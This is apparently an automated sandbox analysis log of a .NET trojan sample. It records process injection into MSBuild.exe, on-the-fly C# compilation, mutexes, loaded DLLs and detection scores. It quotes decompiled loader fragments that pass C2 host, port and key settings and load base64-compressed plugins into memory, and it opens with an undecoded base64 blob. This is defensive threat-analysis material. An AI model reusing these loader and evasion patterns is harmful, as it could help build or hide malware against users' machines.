OG4ENLOcg8zGERM8eGC2upSDu25WFjrVgd6LllJ0OWQQydnS+n1ZQGZj2+udqbJ3URcNSPHvvf4eXXI+ftPupfmKTFMgMgGl0ZqWGgJDDASj5efB03VsJBMv96ihomNJcjM268rPlqgyHCEGC9fT5Zx1dGgFCs3f9pqnR0grIg/8/a7ESXZYDWKk/r/493xnYxcv+dGkkT5Ldj8nxsmHqJpLYh5D9d3Vj791E0oNF87/o5rLbRJ+UM6souLaRUICMCXpvomcsXobAHjKrNqPkHlCdiQ3zdqhqoZVRGk0lIzxzvo6El00JZ604vbiMDh2CtnF9eWSUBY4BBTs24SUo0hbPy/LhaTNlDwycmpl/P3G/NoOKnhgvsKzyOloGh0rHMfe+NMKPC5jboya3tfsFUx0Skqirf3WcEBeCnCshay6+xAxIFBupobR03w6UjMpw8Hxlt5NcRxATo6v0PU3YBxMSp666NDOciEvNk++so2bTV8MIi3v9r27sn4LHyhn8Knw2jI9DyhUlILWwtAYFFkuNPWYsrt3UkIsQvz1vp7kMAlYBo+ErbTcEhIKRUfwjqu1uRwMJxu25+CbzXlybSEn75G4rNwOA05suv63zPVsFCpqQo2d34GwRm4ABcniuZS+RQUoGkSqnNmc2AAWWnaslIK2/xQ/UiUw9s+Um+FwYCU9/9Cy4r8pOFk4SIae/vnLZBBITOXs3YiPHnUTBln36ZeXUGAaLXaum4jw+DZKS0Bh8IDe1jYDcWkJ1Pb4iZ9BQXUCIcCbrqswJghNEKy8ms7qOCB+AnOIq9KPY2BDCAuCyZ2pjUh3CRlK3uObjjgnIGJtv9jkxNIGMmBoRvjYgrQhRGsWFN7Q+auzVzh7ZnSi1t/0HUQMH1mXn/eg3AxXc1CFuo6y4xhpCiEw/8qc69dkaTo73bTOr91ScWBIDMjfs7m7MUQRBtPEkKqTOX5tBGTo7LOXpUIPPDnpxKbh5F4JDgAMpNXOoI9WUn0J6PL8j5lEansDLc2NvujGSWwvZ/Tq14ypdyRzRWfxuayzr35xGQ2xyuOh7ht7WhsTgJ37gDAOBjYj+orZlJMaZTgVFr/81I4heFUtDYODtLS+b38eKz/ghoagTQxRFhv6/M2ko01aJTEDip7ar05AHSAZ9dyJqtBgVSEiK//29pcLbG5xBP/Gv92wKVwnCT2QiLCaNGplCXfz/KavvXMkNSwfyu++/jYldhwavMqfoIlaEz07iMOuzqNJTi0DPtyCs5nCK1ZsZa2fv+zyICgGainZ5+GEqyZVBRKo8eP2iVNYQCpE2vWZ54NMVj8t45TFnI9afy5QPbf3rLHKbWc6PdblkLWwelMdIDXlgMfh5RBLGx7T7ca0p1FWIgoC3dfuiK9PBCUm4uL4s8lsdSBUbtvhpvVbVmR6G8Gag77XDQBcHSve65SMK11vGgCxzZqT4CB5Snhegq60vnModhgw7Mf+q5ZEXDgjIeb
Source: 0.2.147.45.44.42 tqvjt.exe.2802604.1.raw.unpack, ClientSocket.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.147.45.44.42 tqvjt.exe.2802604.1.raw.unpack, ClientSocket.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.147.45.44.42 tqvjt.exe.2812b30.0.raw.unpack, ClientSocket.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.147.45.44.42 tqvjt.exe.2812b30.0.raw.unpack, ClientSocket.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: classification engine Classification label: mal100.troj.expl.evad.winEXE@8/7@0/2
Source: C:\Users\user\Desktop\147.45.44.42 tqvjt.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\147.45.44.42 tqvjt.exe.log Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Mutant created: NULL
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Mutant created: \Sessions\1\BaseNamedObjects\1z82HQuLhx64iICU
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2016:120:WilError_03
Source: C:\Users\user\Desktop\147.45.44.42 tqvjt.exe File created: C:\Users\user\AppData\Local\Temp\rjhqheow Jump to behavior
Source: 147.45.44.42 tqvjt.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 147.45.44.42 tqvjt.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\147.45.44.42 tqvjt.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: 147.45.44.42 tqvjt.exe Virustotal: Detection: 38%
Source: 147.45.44.42 tqvjt.exe ReversingLabs: Detection: 37%
Source: unknown Process created: C:\Users\user\Desktop\147.45.44.42 tqvjt.exe "C:\Users\user\Desktop\147.45.44.42 tqvjt.exe"
Source: C:\Users\user\Desktop\147.45.44.42 tqvjt.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\rjhqheow\rjhqheow.cmdline"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESB31E.tmp" "c:\Users\user\AppData\Local\Temp\rjhqheow\CSCCA9215E6E5774A1BA7192FC2B24677.TMP"
Source: C:\Users\user\Desktop\147.45.44.42 tqvjt.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\Users\user\Desktop\147.45.44.42 tqvjt.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\rjhqheow\rjhqheow.cmdline" Jump to behavior
Source: C:\Users\user\Desktop\147.45.44.42 tqvjt.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESB31E.tmp" "c:\Users\user\AppData\Local\Temp\rjhqheow\CSCCA9215E6E5774A1BA7192FC2B24677.TMP" Jump to behavior
Source: C:\Users\user\Desktop\147.45.44.42 tqvjt.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\Desktop\147.45.44.42 tqvjt.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\147.45.44.42 tqvjt.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\147.45.44.42 tqvjt.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\147.45.44.42 tqvjt.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\147.45.44.42 tqvjt.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\147.45.44.42 tqvjt.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\147.45.44.42 tqvjt.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\147.45.44.42 tqvjt.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\147.45.44.42 tqvjt.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\147.45.44.42 tqvjt.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\147.45.44.42 tqvjt.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\147.45.44.42 tqvjt.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\147.45.44.42 tqvjt.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\147.45.44.42 tqvjt.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\147.45.44.42 tqvjt.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\147.45.44.42 tqvjt.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Users\user\Desktop\147.45.44.42 tqvjt.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Users\user\Desktop\147.45.44.42 tqvjt.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Users\user\Desktop\147.45.44.42 tqvjt.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\147.45.44.42 tqvjt.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\147.45.44.42 tqvjt.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\147.45.44.42 tqvjt.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\147.45.44.42 tqvjt.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Users\user\Desktop\147.45.44.42 tqvjt.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Users\user\Desktop\147.45.44.42 tqvjt.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\147.45.44.42 tqvjt.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: avicap32.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: msvfw32.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\147.45.44.42 tqvjt.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32 Jump to behavior
Source: 147.45.44.42 tqvjt.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: 147.45.44.42 tqvjt.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: 147.45.44.42 tqvjt.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: q6C:\Users\user\AppData\Local\Temp\rjhqheow\rjhqheow.pdb@\ source: 147.45.44.42 tqvjt.exe, 00000000.00000002.1594780205.0000000002761000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: q6C:\Users\user\AppData\Local\Temp\rjhqheow\rjhqheow.pdb source: 147.45.44.42 tqvjt.exe, 00000000.00000002.1594780205.0000000002761000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation
barindex
.NET source code contains method to dynamically call methods (often used by packers)
Source: 0.2.147.45.44.42 tqvjt.exe.2802604.1.raw.unpack, Messages.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.147.45.44.42 tqvjt.exe.2802604.1.raw.unpack, Messages.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.147.45.44.42 tqvjt.exe.2812b30.0.raw.unpack, Messages.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.147.45.44.42 tqvjt.exe.2812b30.0.raw.unpack, Messages.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
.NET source code contains potential unpacker
Source: 0.2.147.45.44.42 tqvjt.exe.2802604.1.raw.unpack, Messages.cs .Net Code: Plugin System.AppDomain.Load(byte[])
Source: 0.2.147.45.44.42 tqvjt.exe.2802604.1.raw.unpack, Messages.cs .Net Code: Memory System.AppDomain.Load(byte[])
Source: 0.2.147.45.44.42 tqvjt.exe.2802604.1.raw.unpack, Messages.cs .Net Code: Memory
Source: 0.2.147.45.44.42 tqvjt.exe.2812b30.0.raw.unpack, Messages.cs .Net Code: Plugin System.AppDomain.Load(byte[])
Source: 0.2.147.45.44.42 tqvjt.exe.2812b30.0.raw.unpack, Messages.cs .Net Code: Memory System.AppDomain.Load(byte[])
Source: 0.2.147.45.44.42 tqvjt.exe.2812b30.0.raw.unpack, Messages.cs .Net Code: Memory
Binary contains a suspicious time stamp
Source: 147.45.44.42 tqvjt.exe Static PE information: 0xA0870305 [Thu May 6 07:51:33 2055 UTC]
Compiles C# or VB.Net code
Source: C:\Users\user\Desktop\147.45.44.42 tqvjt.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\rjhqheow\rjhqheow.cmdline"
Source: C:\Users\user\Desktop\147.45.44.42 tqvjt.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\rjhqheow\rjhqheow.cmdline" Jump to behavior
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_01617DA0 push eax; iretd 5_2_01617DA1
Drops PE files
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\rjhqheow\rjhqheow.dll Jump to dropped file
Source: C:\Users\user\Desktop\147.45.44.42 tqvjt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\147.45.44.42 tqvjt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\147.45.44.42 tqvjt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\147.45.44.42 tqvjt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\147.45.44.42 tqvjt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\147.45.44.42 tqvjt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\147.45.44.42 tqvjt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\147.45.44.42 tqvjt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\147.45.44.42 tqvjt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\147.45.44.42 tqvjt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\147.45.44.42 tqvjt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\147.45.44.42 tqvjt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\147.45.44.42 tqvjt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\147.45.44.42 tqvjt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\147.45.44.42 tqvjt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\147.45.44.42 tqvjt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\147.45.44.42 tqvjt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\147.45.44.42 tqvjt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\147.45.44.42 tqvjt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\147.45.44.42 tqvjt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\147.45.44.42 tqvjt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\147.45.44.42 tqvjt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\147.45.44.42 tqvjt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\147.45.44.42 tqvjt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\147.45.44.42 tqvjt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\147.45.44.42 tqvjt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\147.45.44.42 tqvjt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\147.45.44.42 tqvjt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\147.45.44.42 tqvjt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\147.45.44.42 tqvjt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\147.45.44.42 tqvjt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\147.45.44.42 tqvjt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\147.45.44.42 tqvjt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\147.45.44.42 tqvjt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\147.45.44.42 tqvjt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\147.45.44.42 tqvjt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\147.45.44.42 tqvjt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\147.45.44.42 tqvjt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\147.45.44.42 tqvjt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
